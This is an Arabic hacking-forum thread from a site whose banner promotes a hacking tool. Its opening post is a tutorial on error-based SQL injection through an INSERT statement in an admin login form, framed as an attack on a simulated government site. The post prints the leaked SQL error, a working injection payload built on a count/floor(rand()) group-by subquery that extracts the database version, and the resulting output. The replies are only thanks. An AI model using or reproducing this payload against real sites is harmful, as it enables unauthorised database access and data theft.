1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
  2. الملاحظات
    عزيزي زائر تم اطلاق الموقع الرسمي لبرنامج الاختراق Spy-Note
    إستبعاد الملاحظة
حالة الموضوع:
مغلق
  1. ZeRo TiMe
    rank
    Developer

    عضو منذ:
    ‏20 ديسمبر 2011
    عدد المشاركات:
    38
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    30
    الإقامة:
    قــ الأمة ـلــب
    السلام عليكم ورحمة الله

    اولا الفكرة محاكاة لموقع حكومي.. اقول فكرة وليس شرح .. فكرة الحقن استعلام insert

    معنا موقع مصاب في لوحة التحكم :

    كود PHP:
    www.site.gov.com/admin/login.php
    نضع ' في خانة اليوزر والباس :

    يظهر لنا خطأ :

    كود PHP:
    INSERT INTO project_user_logins (project_id,username,password,server_name,server_address,remote_address,succed,tsVALUES ('14'''', ''''www.site.gov.com''127.0.0.1''127.0.0.1''0''1382008397'You have an error in your SQL syntaxcheck the manual that corresponds to your MySQL server version for the right syntax to use near '\'''www.site.gov.com''127.0.0.1''127.0.0.1''0''1382008397'at line 1
    كما تلاحظون خانة ليوزر ليس عليها حماية addslashes اما خانة الباس فعليها حماية

    راح نستفيد من خانة اليوزر

    اول شيىء لو تلاحظ راح تشوف insert INTO

    هذا استعلام لإضافة شيىء الى القاعدة وبالأخص الجدول project_user_logins فيه 8 اعمدة :

    كود PHP:
    INSERT INTO project_user_logins (project_id,username,password,server_name,server_address,remote_address,succed,ts
    )

    والقيم الـ 8 :

    كود PHP:
    VALUES ('14'''', ''''www.site.gov.com''127.0.0.1''127.0.0.1''0''1382010385')
    اول قيمة هي 14 ثابتة وتخص العمود project_id يبقى امامنا 7 قيم

    احنا نستغل خانة اليوزر ونضع 7 قيم ثم فاصلة ثم استعلام الحقن .

    راح يكون الحقن هكذا :

    ملاحظة : الحقن عبر عملية POST ونوع الحقن ايرور بازد ..

    نضع في خانة اليوزر الآتياول قيمة هي 14 ثابتة وتخص العمود project_id يبقى امامنا 7 قيم

    احنا نستغل خانة اليوزر ونضع 7 قيم ثم فاصلة ثم استعلام الحقن .

    راح يكون الحقن هكذا :

    ملاحظة : الحقن عبر عملية POST ونوع الحقن ايرور بازد ..

    نضع في خانة اليوزر الآتي

    كود PHP:
    dz','1','2','3','4','5','6),((select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a))%23
    كل ما فعلناه اعطينا 7 قيم اللي يحتاجها الإستعلام ،، غلقنا الإستعلام بقوس
    ثم فاصلة : واستعلام جديد بين قوسين وفي الأخير عملنا تعليق ..

    وهذا شكل الإستعلام :

    كود PHP:
    INSERT INTO project_user_logins (project_id,username,password,server_name,server_address,remote_address,succed,tsVALUES ('14'''),((select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a))#', '', 'www.site.gov.com', '127.0.0.1', '127.0.0.1', '0', '1382010687') Duplicate entry '5.1.41-debug-log1' for key 'group_key
    '

    صورة :

    [​IMG]

    النتيجة :

    كود PHP:
    Duplicate entry '5.1.41-debug-log1' for key 'group_key'
    طبعا مش محتاجة تستعلم عن الجداول فهي امامك في الخطا .. فكرة الحقن استعلام insert

    الموضوع لسبب تعليمي فقط .. &:"

    تحميل الشرح

    [hide]
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    [/hide]

    )5:"​
     
    جاري تحميل الصفحة...
  2. Crazy BoOoy
    rankrank
    Developer

    عضو منذ:
    ‏1 نوفمبر 2011
    عدد المشاركات:
    61
    الإعجابات المتلقاة:
    7
    نقاط الجائزة:
    30
    الوظيفة:
    طالب
    الإقامة:
    J̺͆o̺͆r̺͆d̺͆a̺͆n̺͆
    نظام التشغيل:
    Linux
    رد: الحقن في استعلام insert

    الله يعطيك الف عافية اخي العزيز,
     
  3. كلآشنكوف
    Developer

    عضو منذ:
    ‏19 يوليو 2012
    عدد المشاركات:
    86
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    30
    رد: الحقن في استعلام insert

    تسلم ايدك مبدع
     
  4. salem k
    rank
    Developer

    عضو منذ:
    ‏10 ديسمبر 2013
    عدد المشاركات:
    5
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    نظام التشغيل:
    windows 8
    رد: الحقن في استعلام insert

    تسلم ايدك تسلم ايدك
     
  5. cute hacker
    rank
    Developer

    عضو منذ:
    ‏28 يونيو 2013
    عدد المشاركات:
    6
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    نظام التشغيل:
    Linux
    رد: الحقن في استعلام insert

    thannnnnnnnnnnnnnnnnki:q^:
     
  6. X444X TEAM
    rank
    Developer

    عضو منذ:
    ‏30 يوليو 2012
    عدد المشاركات:
    40
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    رد: الحقن في استعلام insert

    مشكور حبيبي
    جاري التقيم ان امكن[واصل ابداعكـً#ٌ5oًًًُ.]
     
  7. HaMaM-HaCkEr
    DeveloPer Plus

    عضو منذ:
    ‏22 نوفمبر 2012
    عدد المشاركات:
    110
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    40
    رد: الحقن في استعلام insert

    عليكم السلام ورحمة الله وبركاته

    باركـ الله فيك اخي وبمجهودك

    وفقك الله ,,,
     
  8. الديلر الفلسطيني
    rank
    Developer

    عضو منذ:
    ‏14 يناير 2014
    عدد المشاركات:
    5
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    نظام التشغيل:
    windows 8
    رد: الحقن في استعلام insert

    كفو ياا بطل
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...